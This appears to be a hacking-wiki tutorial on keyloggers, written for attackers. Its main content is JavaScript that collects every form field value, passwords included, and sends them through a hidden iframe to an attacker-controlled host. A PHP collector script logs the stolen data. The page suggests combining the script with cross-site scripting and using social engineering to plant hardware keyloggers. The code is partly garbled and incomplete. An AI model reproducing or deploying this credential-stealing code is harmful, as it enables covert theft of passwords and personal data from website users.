Keylogging
Keylogging is the fact of recording the keys pressed by the user when entering data so that you can know what the target typed, including passwords and crap.
The most used one concerning website hacking.
//---Javascript
//This is an example of a keylogger. There is also a php file on this article you can use to capture the data.
randVal = 'loldongs'+(Math.round((10000-5000) * Math.random() + 5000));
wp='';
window.onload=function(){
window.document.body.innerHTML=''+window.document.body.innerHTML+wp+'';
}
function kl(){
inp=document.getElementsByTagName('input');
qs='';
for(var i = 0; i < inp.length; i++){
qs=qs+i+'_'+inp[i].name+'='+inp[i].value+'&';
}
cn=document.getElementById(randVal);
kf='<iframe style="width:0;height:0;" src="http://CAPTUREHOST/capture.php?'+qs+'"></iframe>';
cn.innerHTML=kf;
}
This sample basically calls the kl() function each time a key is pressed. This one sends the reference of the key(s) to this script, on the hacker's server :
//---capture.php
//This will catch all data passed as querystrings and save them in a readable format with IP, referrer & timestamp
$val){
fwrite($fh, $qs."=".$val.'|');
}
fwrite($fh, "\n");
fclose($fh);
?>
Everything is stored in the dumpfile and a normal user can't see he is being spied on. This kind of keylogger is often used in combination with Cross site scripting.
This one is a tiny device more often than not plugged between the computer and the keyboard of the target. Since this is a real life hack, you may use Social Engineering in order to gain access to the target's office or such. If you want to know more about these : Wikipedia
Often implemented via as virus or such, this keylogger runs on the target's computer like a normal program and logs every key he press.
To be completed
- MyHook is a shitty keylogger, however, it's opensource, so anyone with C++ knowledge should be able to adapt it to his needs {{Tutorials}}